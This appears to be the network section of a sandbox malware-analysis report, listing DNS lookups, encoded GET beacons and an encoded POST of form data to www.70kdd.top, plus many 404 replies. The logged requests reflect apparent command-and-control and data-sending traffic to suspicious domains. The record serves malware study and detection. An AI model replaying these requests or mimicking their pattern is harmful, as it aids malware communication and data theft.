Source: global traffic | HTTP traffic detected: GET /z3ox/?bBw=XRVN9XS8GrL3N+/sXJw1nASfMdlrVHj65QayKB69AEGBKWegVMYG7P4Sa4h2i8A2rJx8M9mN63brSxfD4lNhUirL/6ZuF4cRwiIE0+ehkyVFqeLMeg==&PBk=f4VDN8Bp14IhbV HTTP/1.1 | Host: www.questmatch.pro | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Source: global traffic | HTTP traffic detected: GET /crrp/?bBw=upjfZKq4/ZGfoF/T3gRqvMsDposBEsbCPxdbSO05fQ4zSiP5+UGAxJqZOtAYqZWCOef+BeM6z+3JdRqWgtx/gAtazJHp7Z7XNdyJQnSFd8YmyBfIfQ==&PBk=f4VDN8Bp14IhbV HTTP/1.1 | Host: www.bser101pp.buzz | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Source: global traffic | DNS traffic detected: DNS query: www.rtpterbaruwaktu3.xyz
Source: global traffic | DNS traffic detected: DNS query: www.70kdd.top
Source: global traffic | DNS traffic detected: DNS query: www.acond-22-mvr.click
Source: global traffic | DNS traffic detected: DNS query: www.smartcongress.net
Source: global traffic | DNS traffic detected: DNS query: www.mrpokrovskii.pro
Source: global traffic | DNS traffic detected: DNS query: www.ytsd88.top
Source: global traffic | DNS traffic detected: DNS query: www.matteicapital.online
Source: global traffic | DNS traffic detected: DNS query: www.llljjjiii.shop
Source: global traffic | DNS traffic detected: DNS query: www.ampsamkok88.shop
Source: global traffic | DNS traffic detected: DNS query: www.gogawithme.live
Source: global traffic | DNS traffic detected: DNS query: www.54248711.xyz
Source: global traffic | DNS traffic detected: DNS query: www.canadavinreport.site
Source: global traffic | DNS traffic detected: DNS query: www.questmatch.pro
Source: global traffic | DNS traffic detected: DNS query: www.bser101pp.buzz
Source: global traffic | DNS traffic detected: DNS query: www.3kw40881107247y.click
Source: unknown | HTTP traffic detected: POST /klhq/ HTTP/1.1 | Host: www.70kdd.top | Accept: */* | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Origin: http://www.70kdd.top | Cache-Control: max-age=0 | Content-Length: 192 | Connection: close | Content-Type: application/x-www-form-urlencoded | Referer: http://www.70kdd.top/klhq/ | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS) | Data Raw: 62 42 77 3d 4e 46 77 66 6f 58 62 65 63 77 61 77 57 5a 30 4c 72 69 44 39 76 66 6c 76 45 4d 36 6b 31 4e 44 55 63 30 6a 53 51 43 51 31 66 64 55 56 64 6d 76 4d 30 70 39 46 2f 34 34 75 45 44 33 77 61 6c 65 30 7a 54 72 39 6d 7a 2f 6d 68 41 57 70 63 73 31 75 47 50 52 6d 69 64 33 51 6b 58 78 68 6c 70 34 68 30 34 77 55 39 4b 58 4b 30 42 61 65 32 39 73 53 41 51 62 44 44 57 41 68 38 31 68 66 39 65 68 56 39 6f 36 73 38 46 42 41 62 73 5a 69 7a 51 30 4b 68 64 42 38 31 6e 74 65 46 6d 72 39 42 63 77 32 64 36 46 59 78 71 48 66 61 36 51 33 72 73 6e 73 71 63 72 4f 74 6e 35 4a 4d 31 4b 35 | Data Ascii: bBw=NFwfoXbecwawWZ0LriD9vflvEM6k1NDUc0jSQCQ1fdUVdmvM0p9F/44uED3wale0zTr9mz/mhAWpcs1uGPRmid3QkXxhlp4h04wU9KXK0Bae29sSAQbDDWAh81hf9ehV9o6s8FBAbsZizQ0KhdB81nteFmr9Bcw2d6FYxqHfa6Q3rsnsqcrOtn5JM1K5
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Thu, 21 Nov 2024 15:20:35 GMT | server: LiteSpeed | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic | HTTP traffic detected (4 identical responses, Date: Thu, 21 Nov 2024 15:20:53, 15:20:55, 15:20:58 and 15:21:01 GMT): HTTP/1.1 404 Not Found | Server: nginx | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66e01838-94" | Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    content-type: text/html; charset=iso-8859-1
                    content-length: 196
                    date: Thu, 21 Nov 2024 15:21:24 GMT
                    server: LiteSpeed
                    x-tuned-by: N0C
                    connection: close
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    content-type: text/html; charset=iso-8859-1
                    content-length: 196
                    date: Thu, 21 Nov 2024 15:21:26 GMT
                    server: LiteSpeed
                    x-tuned-by: N0C
                    connection: close
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    content-type: text/html; charset=iso-8859-1
                    content-length: 196
                    date: Thu, 21 Nov 2024 15:21:29 GMT
                    server: LiteSpeed
                    x-tuned-by: N0C
                    connection: close
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    content-type: text/html; charset=iso-8859-1
                    content-length: 196
                    date: Thu, 21 Nov 2024 15:21:32 GMT
                    server: LiteSpeed
                    x-tuned-by: N0C
                    connection: close
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 21 Nov 2024 15:21:39 GMT
                    Content-Type: text/html
                    Content-Length: 548
                    Connection: close
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 21 Nov 2024 15:21:42 GMT
                    Content-Type: text/html
                    Content-Length: 548
                    Connection: close
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 21 Nov 2024 15:21:45 GMT
                    Content-Type: text/html
                    Content-Length: 548
                    Connection: close
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 21 Nov 2024 15:21:47 GMT
                    Content-Type: text/html
                    Content-Length: 548
                    Connection: close
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 21 Nov 2024 15:21:55 GMT
                    Content-Type: text/html
                    Content-Length: 409
                    Connection: close
                    ETag: "66d016cf-199"
                    Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 21 Nov 2024 15:22:00 GMT
                    Content-Type: text/html
                    Content-Length: 409
                    Connection: close
                    ETag: "66d016cf-199"
                    Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 21 Nov 2024 15:22:03 GMT
                    Content-Type: text/html
                    Content-Length: 409
                    Connection: close
                    ETag: "66d016cf-199"
                    Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Thu, 21 Nov 2024 15:22:42 GMT
                    Content-Type: text/html; charset=iso-8859-1
                    Transfer-Encoding: chunked
                    Connection: close
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BjKVYOoOrM11IgIlfh1%2Bf2WxSOXkBcXa5Ddz0z8EyzZud1gcrcKiOOtjw%2FXu5%2BeqTEmf5N3%2FD3kJRyslTP3UrLOIgI2GIP3dOe1LSFxtcRPDFwRdyxGQFyniT4YuuaUJj4ciQed8Yw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8e61ad3eca210f70-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1580&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=604&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Thu, 21 Nov 2024 15:22:45 GMT
                    Content-Type: text/html; charset=iso-8859-1
                    Transfer-Encoding: chunked
                    Connection: close
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gMZGK1ElQpsQRBkpCuE1BjbMBg2uqWfXOyBUdqIHgN5iPAiDPHbk9LFDu1xJhT68UUsAhmtUbbVAv8MHp7RJvA2QJ9LOdIMTkre5VvuWGrdfrLdM3xU01gOsWkTD02nBcY9YsBxR1w%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8e61ad4fbe7142ea-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1611&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=628&delivery_rate=0&cwnd=141&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Thu, 21 Nov 2024 15:22:47 GMT
                    Content-Type: text/html; charset=iso-8859-1
                    Transfer-Encoding: chunked
                    Connection: close
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WNJHNMP1s4YqATvDiWrCgeCuP33KOWUl9QLx7VCZa6ggiLLWkglY3iE%2BG6vJnnWhLyQ7YBz1%2Fz0G%2Fk5NvqwGbipoEPRh6EOWWlAz1FGij3c9o2fzExkQLVDz4t9%2FDU9hIeZweCxwEQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8e61ad6079ea32d0-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=3123&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1641&delivery_rate=0&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Thu, 21 Nov 2024 15:22:50 GMT
                    Content-Type: text/html; charset=iso-8859-1
                    Transfer-Encoding: chunked
                    Connection: close
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=En%2BN%2BPcwoi8J4UHt61U1AZt8GLf4%2F%2FaB86evH%2Bv6dcGDcDNlvLNoQIT3y8mSYLvwvipgtgFbHaI01pQnyLPae70cJoJxzdpmWegBU4Y1EZWz7VHhyhP6rgPEGM4%2B91i90LSHdytFHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8e61ad724b5943b0-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=2099&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=342&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                    Data Ascii: 4e5<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$par
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Thu, 21 Nov 2024 15:22:57 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Thu, 21 Nov 2024 15:23:00 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:23:02 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:23:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 15:23:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 